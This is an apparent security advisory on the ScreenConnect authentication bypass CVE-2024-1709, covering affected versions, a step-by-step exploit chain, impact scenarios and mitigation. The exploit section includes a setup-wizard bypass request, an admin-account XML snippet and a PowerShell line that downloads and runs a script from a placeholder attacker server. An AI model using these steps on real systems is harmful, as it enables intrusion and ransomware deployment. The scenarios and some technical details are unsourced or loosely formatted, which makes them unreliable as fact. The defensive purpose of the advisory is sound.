Critical ConnectWise ScreenConnect Vulnerability Exploited in Ransomware Attacks
CVE-2024-1709 is a critical authentication bypass vulnerability in ConnectWise ScreenConnect (versions ≤23.9.7) that enables attackers to gain administrative control without credentials. With a maximum CVSS score of 10/10, this flaw allows attackers to remotely compromise systems, create privileged accounts, and execute malicious payloads when chained with CVE-2024-1708 (path traversal). Over 3,800 vulnerable instances were exposed at discovery, with active exploitation observed in ransomware campaigns.
Technical Analysis of CVE-2024-1709
Affected Versions:
ScreenConnect 23.9.7 and earlier
All deployment modes (cloud/on-premises)
Attack Mechanism:
The vulnerability stems from improper access controls in /SetupWizard.aspx, allowing attackers to:
Access post-installation setup wizard via modified HTTP requests
Create new administrator accounts through forced redirects
Bypass multi-factor authentication (MFA) protections
Exploit Chain Example (SlashAndGrab Attack):
Initial Access: Attacker sends malformed request to
/SetupWizard.aspx/with trailing slash6:textGET /SetupWizard.aspx/ HTTP/1.1 Host: vulnerable-hostThis triggers a 302 redirect to the setup wizard interface.
Privilege Escalation: Attacker creates administrative account via XML configuration:
xml<User> <Id>hacker123</Id> <IsAdministrator>true</IsAdministrator> <PasswordHash>malicious_hash</PasswordHash> </User>This gets written to
User.xmlwith full system privileges.Payload Delivery: Using CVE-2024-1708, attackers upload ZIP archive containing:
Malicious .ASHX web handler disguised as extension
Base64-encoded PowerShell commands for reverse shells
powershellIEX(New-Object Net.WebClient).DownloadString('http://attacker-server/payload.ps1')Lateral Movement: Successful exploitation enables:
Deployment of ToddlerShark ransomware (linked to Kimsuky APT)
Credential harvesting via ScreenConnect's trusted status
Network propagation using ScreenConnect's remote access tools
Real-World Impact Scenarios
Scenario 1: Healthcare Data Breach
Attackers compromised a regional hospital's ScreenConnect server (v23.9.6), exfiltrating 450,000 patient records. They used forged administrator accounts to disable endpoint protection before deploying LockBit ransomware.
Scenario 2: MSP Supply Chain Attack
A managed service provider's unpatched ScreenConnect instance allowed attackers to push malicious updates to 1,200 client systems. The attackers installed cryptocurrency miners and persistence mechanisms across the network.
Scenario 3: Critical Infrastructure Compromise
State-sponsored actors exploited CVE-2024-1709 in an energy grid operator's systems, maintaining undetected access for 78 days. They manipulated SCADA systems through ScreenConnect's remote CLI access.
Mitigation and Response
Immediate Patching:
Upgrade to ScreenConnect ≥23.9.8 (includes authentication hardening)
Verify via
Help > Aboutin ScreenConnect console
Compromise Checks:
sqlSELECT * FROM User WHERE CreationDate > '2024-02-19' -- Audit admin accounts created after vulnerability disclosure[8]Review
App_Data\User.xmlfor suspicious accountsMonitor for
SetupWizard.aspxaccess in web logs
Containment Measures:
Network segmentation of ScreenConnect servers
Revoke all API keys/sessions created before patching
Implement IP allowlisting for management interfaces
CISA Recommendations:
Catalogued as KEV #CVE-2024-1709 (action deadline Feb 29, 2024)
Mandatory credential rotation for all ScreenConnect users
This vulnerability demonstrates how authentication flaws in trusted remote access tools can cascade into catastrophic breaches. The combination of public exploit availability (since Feb 2024) and ScreenConnect's privileged access position makes prompt remediation critical for all affected organizations
- https://nvd.nist.gov/